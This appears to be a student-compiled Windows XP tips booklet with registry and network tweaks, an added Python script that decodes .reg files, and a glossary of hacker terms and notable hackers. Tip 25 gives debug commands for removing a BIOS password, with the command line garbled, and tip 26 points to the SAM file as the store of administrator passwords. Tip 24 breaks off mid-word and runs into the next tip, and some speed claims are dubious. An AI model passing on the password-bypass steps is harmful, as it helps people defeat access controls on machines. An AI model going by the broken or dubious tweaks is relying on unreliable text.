Open the registry editor by going to Start, then Run, and entering regedit. Once in the registry, navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings. Right-click > New > DWORD. Type MaxConnectionsPerServer. You can set the value (the higher the number, the more speed you get, e.g. 99). Create another DWORD, MaxConnectionsPer1_0Server, and put a high value in it as mentioned above. Restart I.E. and you are done.
20) Disable Disk Performance Counters:

Win XP comes with many inbuilt performance monitoring applications that constantly examine various parts of the system. This information can be of real use to a system administrator for collecting performance statistics. However, for a home user, these statistics hold no value and since the monitoring happens all the time, it consumes a good deal of system resources. Disk monitoring, for example, happens in the background, and turning it off is advisable if you will not be using the performance monitoring applications. To turn it off, type in diskperf -N at a command prompt. To bring up the command prompt: go to Start > Run, type in cmd and press [Enter].
21) Removing Multiple Boot Screens:

If you are getting an unwanted multiple boot screen, then follow these steps.
1> Right-click on My Computer.
2> Select Properties.
3> Select the Advanced tab.
4> Select Settings in the Startup & Recovery section (3rd group).
5> Select the operating system which you want.
6> And click OK.
7> Further, again press Settings and click on Edit.
8> It will open the boot.ini file.
9> Now you can delete those OSes which you don't want to be displayed.
Note: For deleting operating systems from the boot.ini file, keep in mind that you can't delete the OS which is selected by default there. Before making any changes, make a copy of the boot.ini file.

22) Enabling Hibernation:

Go to Display Properties > Screen Savers > Power > Hibernate. Check 'Enable Hibernation'. Press the Shift key after you click 'Turn Off Computer' in the Start menu.
23) To Increase the Internet Speed:

Open Notepad and paste the code below into it (the first line is the header regedit requires before it will import a .reg file):

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c

Now save this file as speed.reg. Execute it and observe the change!
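As an added example (not from the book), the following Python script parses a .reg file in the format used by the speed.reg tweak above and decodes the binary "Scancode Map" value from the Win-key tip (12), so both registry edits can be read back and checked instead of applied blindly. The sample .reg text is constructed here from the values the book gives (the Scancode Map bytes are written in .reg "hex:" syntax); the function names parse_reg, decode_scancode_map and describe_tcp1323 are this example's own, not part of Windows or regedit.

```python
"""Parse a Windows .reg export and decode two value types the XP tips use.

Added example: a small parser for the "Windows Registry Editor Version 5.00"
text format (dword:, hex: and "string" values) plus a decoder for the binary
Scancode Map layout that the Win-key tip writes.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample .reg text: the TCP/IP tweak from tip 23 and the Scancode
# Map value from tip 12, expressed in .reg syntax.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
"Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,\
  00,00,5c,e0,00,00,00,00
"""


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Return {key_path: {value_name: decoded}}.

    dword: values become ints, hex: values become bytes, quoted values become
    str. Only plain hex: (REG_BINARY) is handled, not hex(2):/hex(7): variants.
    """
    # A trailing backslash continues a hex: list on the next line; join them.
    text = re.sub(r",\\\r?\n\s*", ",", text)
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if not m or current is None:
            raise ValueError(f"unparsable line: {line!r}")
        name, raw = m.group(1), m.group(2)
        if raw.startswith("dword:"):
            keys[current][name] = int(raw[len("dword:"):], 16)
        elif raw.startswith("hex:"):
            keys[current][name] = bytes(int(b, 16) for b in raw[len("hex:"):].split(",") if b)
        elif raw.startswith('"') and raw.endswith('"'):
            keys[current][name] = raw[1:-1]
        else:
            raise ValueError(f"unsupported value syntax: {raw!r}")
    return keys


def decode_scancode_map(blob: bytes) -> List[Tuple[int, int]]:
    """Decode the Scancode Map layout and return (original, new) scan-code pairs.

    Layout: 8 header bytes (version, flags), a little-endian DWORD count of
    4-byte entries including the all-zero terminator, then one DWORD per
    mapping whose low word is the new scan code and high word the original.
    A new code of 0 disables the original key.
    """
    if len(blob) < 12:
        raise ValueError("Scancode Map too short")
    count = int.from_bytes(blob[8:12], "little")
    if len(blob) != 12 + 4 * count:
        raise ValueError("length does not match entry count")
    if blob[12 + 4 * (count - 1):] != b"\x00\x00\x00\x00":
        raise ValueError("missing null terminator")
    entries = []
    for i in range(count - 1):  # skip the terminator entry
        off = 12 + 4 * i
        new = int.from_bytes(blob[off:off + 2], "little")
        orig = int.from_bytes(blob[off + 2:off + 4], "little")
        entries.append((orig, new))
    return entries


def describe_tcp1323(opts: int) -> Dict[str, bool]:
    """Tcp1323Opts is a bit field: bit 0 = window scaling, bit 1 = timestamps."""
    return {"window_scaling": bool(opts & 1), "timestamps": bool(opts & 2)}


if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    tcp = reg[r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"]
    print("TcpWindowSize =", tcp["TcpWindowSize"], "bytes")
    print("Tcp1323Opts   =", describe_tcp1323(tcp["Tcp1323Opts"]))
    kb = reg[r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout"]
    for orig, new in decode_scancode_map(kb["Scancode Map"]):
        state = "disabled" if new == 0 else f"remapped to 0x{new:04X}"
        print(f"scan code 0x{orig:04X} {state}")
```

Run as-is, it reports TcpWindowSize decoded to 372300 bytes, Tcp1323Opts=3 as window scaling plus timestamps, and two Scancode Map entries, E05B and E05C (left and right Win key), mapped to 0, i.e. disabled. Pointed at a regedit export of a real machine, the same parser lets an administrator spot unexpected keyboard remaps or TCP/IP parameter changes before deciding whether to keep them.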
24) Changing Your Dynamic IP Address:

1. Click on "Start" in the bottom left-hand corner of the screen.
2. Click on "Run".
3. Type in "command" and hit OK.
4. Type "ipconfig /release", just like that, and hit "Enter".
5. Type "exit" and leave the prompt.
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "Properties".
8. Right-click on "Local Area Connection" and click "Properties".
9. Double-click on "Internet Protocol (TCP/IP)" in the list under the "General" tab.
10. Click on "Use the following IP address" under the "General" tab.
11. Create an IP address (it doesn't matter what it is; I just type 1 and 2 until it fills the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "OK" button here.
14. Hit the "OK" button again.
15. Right-click back on "Local Area Connection" and go to Properties again.
16. Go back to the "TCP/IP" settings.
17. This time, select "Obtain an IP addres
25) BIOS Password Crack:

1) Boot up Windows from CD.
2) Go to the DOS prompt, or go to the command prompt directly from the Windows start-up menu.
3) Type the command at the prompt: "debug" (without quotes).
4) Type the following lines now exactly as given... 07010 07120 quit exit
5) Exit from the DOS prompt and restart the machine. PASSWORD PROTECTION IS GONE. Just make your backup.
26) Where is the Windows XP administrator password saved?

C:\WINDOWS\SYSTEM32\CONFIG\SAM

27) Windows 2000 Workstation's log-in screen has a "Shutdown" button which you can use to shut down the system without ever logging in. But you can disable Windows 2000 Workstation's "Shutdown" button on the initial log-in screen: run "RegEdit.exe" or "RegEdt32.exe". Select the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Add a value named "ShutdownWithoutLogon" of type "REG_SZ" and set it to "0". Restart Windows.
28) Adding a Shortcut Key to Your Internet Connection:

To add items when you right-click on the Start button: start Regedit. Go to HKEY_CLASSES_ROOT\Directory\Shell. Right-click on Shell and select New / Key. Type in the name of the key and press the Enter key. In the Default name that shows in the right-hand panel, you can add a title with a & character in front of the letter for a shortcut. Right-click on the key you just created and create another key under it called command. For the value of this command, enter the full path and program you want to execute. Now when you right-click on the Start button, your new program will show up. You do not need to reboot first.


Glossary
Lexicon
A hacker is anyone who enjoys the intellectual challenge of creatively overcoming or circumventing limitations, primarily in their fields of interest, namely programming or electrical engineering. As will be discussed below, there is a trend in the popular press to use the term to describe computer criminals, and others whose motivations are less pure than the traditional hacker, which trend greatly annoys many of those old-school computer/technology enthusiasts.

Origin of the term at MIT


The term originally developed at MIT long before computers became common; a "hack" meant a simple, but often inelegant, solution. The term hack came to refer to any clever prank perpetrated by MIT students; the perpetrator is a hacker. To this day the terms hack and hacker are used in that way at MIT, without necessarily referring to computers. When MIT students surreptitiously put a police car atop the dome on MIT's Building 10, that was a hack, and the students involved were therefore hackers. Computer culture at MIT developed when members of the Tech Model Railroad Club started working with a Digital Equipment Corporation PDP-1 computer and applied local model railroad slang to computers. In modern computer culture, the label "hacker" is a compliment, indicating a skilled and clever programmer. In the media, however, it has negative connotations and has become synonymous with "software cracker".

The term hacker is used in five senses in common use:


1. Someone who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day.

2. Someone who (usually illegally) attempts to break into or otherwise subvert the security of a program, system or network, often with malicious intent. This usage was annoying to many in the developer community who grew up with the primary meaning in sense (1), and preferred to keep it that way; they preferred that the media used the term cracker. However, this wound up causing even more problems, as simply creating a new word did nothing to dispel misconceptions. "Black hat hacker" is a phrase that wound up with the same problems as the word "cracker".

3. Someone who attempts to break into systems or networks in order to help the owners of the system by making them aware of security flaws in it. This is referred to by some as a "white hat hacker" or sneaker. Many of these people are employed by computer security companies, and are doing something completely legal; and many were formerly hackers within sense 2.

4. Someone who, through either knowledge or trial and error, makes a modification to an existing piece of software, made available to the hacker community, such that it provides a change of functionality. Such change is normally a benefit. Rather than a competition, the exchange of improvements is most often experienced as a cooperative learning effort.

5. A Reality Hacker or Urban Spelunker (origin: MIT); someone who enjoys exploring air ducts, rooftops, shafts and other hidden aspects of urban life, sometimes including pulling elaborate pranks for the enjoyment and entertainment of the community.

"Script kiddie" is reserved for a computer user of little or no skill who simply follows directions or uses a cook-book approach without fully understanding the meaning of the steps they are performing. "h4x0r" (pronounced Hacks-Or) is a script kiddie in the context of a computer game (i.e. someone who uses a program to modify a game giving them special and unfair advantages). "h4x0r" is often used jokingly or as a term of endearment between gamers.

Note that while the term hacker denotes competence, the noun hack often means kludge and thus has a negative connotation, while the verb hack generally shares the same competent connotations.

The hacker community (the set of people who would describe themselves as hackers, or who would be described by others as hackers) falls into at least three partially overlapping categories.
The word hacker probably derives from the somewhat derogatory hack, used in the newspaper industry typically to refer to a Journalist who types his stories without checking his facts first.


Hacker -- Brilliant Programmer


One who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day. This type of hacker is respected within the development community for the freedom they represent, although the term still carries some of the meaning of Hack, developing programs without adequate planning. This zugzwang sets freedom and the ability to be creative against methodical careful progress. Corporate programming environments typically favor only either the good hackers or the careful computer scientist. At their best, Hackers can be surprisingly productive. Industry standard rates of development are in the range of 6-10 lines of code (debugged, and documented) per hour. A Hacker in stride can produce a few hundred or occasionally even thousands lines of code an hour by leveraging their previous work. As a result a Hacker may be able to sketch out the full shape of a program to a level of quality that can be used for demonstrating ideas in less than a week. Thus it isn't hard to see what some companies find useful in Hacker talent. The down side of Hacker productivity is generally agreed to be in maintainability, documentation, and completion. Very talented hackers may become bored with a project once they have figured out all of the hard parts, and be unwilling to finish off the details. This attitude can cause friction in shops where other programmers are expected to pick up the half finished work, decipher the structures and ideas, and bullet-proof the code. In other cases, where a Hacker is willing to maintain their own code, a company may be unable to find anyone else who is capable or willing to dig through code to maintain the program if the original programmer moves on to a new job.

Hacker -- Computer Criminal


The popular press has been known to use the terms "hacker" and occasionally "cracker" for someone who attempts to break into or otherwise subvert the security of a system or network. Both usages are annoying to many in the developer community who grew up with the primary meaning of "hacker" in the Guru sense, and who don't see the problem solved by the invention of new and nebulous words like "cracker" or "black hat". Instead, there has been a move to define terms when describing these people. What makes someone a "hacker", a "computer criminal", or just a regular computer user? Once these details are known, the proper word (or combination) can be accurately applied. While it will always be possible to use one's "hacker" skills in a destructive way, this tends to go against the loosely defined hacker ethic. One can certainly use hacking skills to commit a crime. However, this means that this particular hacker is now a criminal, vandal, malicious user, etc., existing words that do a much better job of describing the person's actions than the nebulous "cracker". If a locksmith used his skills to break into a building, few would debate that he had crossed into the criminal world and there would be no need to invent a word to define criminal or malicious locksmiths. The reason hackers face these kinds of problems is because the mass media tends to believe anyone who says they are a hacker - and people say they are hackers because of the mass media's sensationalist portrayals. This deceptive cycle will probably only come to an end with the education of reporters and the general public on what constitutes a hacker and what does not. 
A group known as the "Hacker Antidefamation League" has this goal. But, indeed, it's likely that the confusion and dissonance exists precisely because "hacking" describes a *skill set* -- akin to picking locks -- whose tools can be used both ethically and unethically, by both people who are basically ethical, and those who are not (these are two related, but separate distinctions -- what long-time system administrator has not violated a company policy by breaking into some company facility for an authorized user in order that that person can complete an important project?). This may well be the crux of the argument, in fact: so-called 'white-hat' hackers are uncomfortable at the exposure of the darker side of their skill-set, notwithstanding the fact that, like comic-book superheroes, they only utilize those skills for Good.

Software cracking is the process of removing any sort of software-enforced protection scheme from a piece of software.

There are several recurring tools of the trade used by hackers to gain unauthorized access to computers:

Trojan horse


These are applications that seem to do useful work, but set up a back door so that the hacker can later return and enter the system. These include programs which mimic login screens. Viruses that fool a user into downloading and/or executing them by pretending to be useful applications are also sometimes called trojan horses.

Snooper
Applications that capture passwords and other data while they are in transit, either within the computer or over the network.

Virus

An application that propagates itself opportunistically by waiting in the background until the user offers it a new medium to infect. The term came into usage by comparison with biological viruses, which reproduce by infecting a cell and taking advantage of its life functions. Similarly, computer viruses, unlike worms, embed themselves within files on the host system. When "infected" executables run, or sometimes when infected binary data files are read, the virus is able to spread to other binary-format files on the local system, floppy disks or over the network. Viruses are often confused with worms.

Worm

An application that actively probes for known weaknesses across the network, then propagates itself through an exploitation of those weaknesses. The original Usenet post describing the Morris Worm described the distinction between viruses and worms thus: worms do not attach themselves to code. Popular usage appears to favour worms being more active than viruses. However, the Jargon File, as of version 4.4.1, maintains the original sense of the term. A worm in this original sense is any independent program which reproduces itself over a network (a program reproducing itself on the local machine only, repeatedly until the machine crashes, is known as a wabbit). After the comparison between computer viruses and biological viruses, the obvious comparison here is to a bacterium.

Vulnerability Scanner
A tool used to quickly check computers on a network for known weaknesses. Hackers also use port scanners. These check to see which ports on a specified computer are "open" or available to access the computer through.

Exploit (computer science)

A prepared application that takes advantage of a known weakness.

Social engineering

Asking someone for the password or account (possibly over a beer). Also includes looking over someone's shoulder while they enter their password, or posing as someone else in order to get sensitive information.

Root kit

A toolkit for hiding the fact that a computer's security has been compromised. Root kits may include replacements for system binaries so that it becomes impossible to see applications being run by the intruder in the active process tables.

Leet

An English pidgin that helps to obscure hacker discussions and web sites, and paradoxically it simplifies the location of resources in public search engines for those who know the language.

Hacker -- Grey Hat


1) A black-hat hacker turned white-hat. See below. 2) A white-hat hacker who uses black-hat techniques to satisfy their employers, for whom they act as white-hat.


Hacker -- White Hat


White hat hackers often overlap with black hat depending on your perspective. The primary difference is that a white hat hacker observes the hacker ethic, a sort of golden rule of computing similar to: Do unto others as you would have them do unto you. Like black hats, white hats are often intimately familiar with the internal details of security systems, and can delve into obscure machine code when needed to find a solution to a tricky problem without requiring support from a system manufacturer. An example of a hack: Microsoft Windows ships with the ability to use cryptographic libraries built into the operating system. When shipped overseas this feature becomes nearly useless as the operating system will refuse to load cryptographic libraries that haven't been signed by Microsoft, and Microsoft will not sign a library unless the US Government authorizes it for export. This allows the US Government to maintain some perceived level of control over the use of strong cryptography beyond its borders. While hunting through the symbol table of a beta release of Windows, a couple of overseas hackers managed to find a second signing key in the Microsoft binaries. That is without disabling the libraries that are included with Windows (even overseas) these individuals learned of a way to trick the operating system into loading a library that hadn't been signed by Microsoft, thus enabling the functionality which had been lost to non-US users. Whether this is good (white hat) or bad (black hat) may depend on whether you are the US Government or not, but is generally considered by the computing community to be a white hat type of activity.

How Some Hackers Define Themselves


The following is the definition given by the jargon file (a dictionary of hacker jargon) accepted by some (but not all) in the hacker community:

hacker n. [originally, someone who makes furniture with an axe]


1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.
2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming.
3. A person capable of appreciating hack value.
4. A person who is good at programming quickly.
5. An expert at a particular program, or one who frequently does work using it or on it; as in `a Unix hacker'. (Definitions 1 through 5 are correlated, and people who fit them congregate.)
6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example.
7. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations.
8. [deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence `password hacker', `network hacker'. The correct term for this sense is cracker.

The term `hacker' also tends to connote membership in the global community defined by the net (see the network and Internet address). For discussion of some of the basics of this culture, see the How To Become A Hacker FAQ. It also implies that the person described is seen to subscribe to some version of the hacker ethic. It is better to be described as a hacker by others than to describe oneself that way. Hackers consider themselves something of an elite (a meritocracy based on ability), though one to which new members are gladly welcome. There is thus a certain ego satisfaction to be had in identifying yourself as a hacker (but if you claim to be one and are not, you'll quickly be labeled bogus). See also geek, wannabee. This term seems to have been first adopted as a badge in the 1960s by the hacker culture surrounding TMRC and the MIT AI Lab. We have a report that it was used in a sense close to this entry's by teenage radio hams and electronics tinkerers in the mid-1950s.


Notable Hackers
Richard Stallman -- A hacker of the old school, Stallman walked in off the street and got a job at MIT's Artificial Intelligence Lab in 1971. Stallman is a legendary hacker, the founder of the free software movement, a MacArthur "genius grant" recipient and a programmer capable of prodigious exploits.

Ken Thompson and Dennis Ritchie -- The driving creative force behind Bell Labs' legendary computer science operating group, Ritchie and Thompson created UNIX in 1969.

Steve Wozniak -- The co-founder of Apple Computer got his start making devices for phone phreaking.

Linus Torvalds -- Torvalds was a computer science student at the University of Helsinki when he wrote the Linux kernel in 1991.

Eric S. Raymond -- He is one of the founders of the Open Source Initiative and he wrote the famous text The Cathedral and the Bazaar and many other essays. He also maintains the Jargon File for the hacker culture, which was previously maintained by Guy L. Steele, Jr.

Larry Wall -- The creator of the Perl programming language.

Johan Helsingius -- Operated the world's most popular anonymous remailer, the Penet remailer (called penet.fi), until he closed up shop in September 1996.

Tsutomu Shimomura -- Shimomura outhacked and outsmarted Kevin Mitnick, the United States's most infamous hacker, in early 1994.


PREPARED BY

NIKHIL KHANDELWAL (Leader, Supervisor, Page Designer)
RAHUL GUPTA (Ass. Leader, Editor, Page Designer)
ARPIT GARG (Main Source Collector, Page Designer)
MRIGESH BHANDARI (Source Collector)
SHIKHA AGARWAL (Source Collector)
NEHA JAIN (Source Collector)
MANISH PUROHIT (Source Collector)
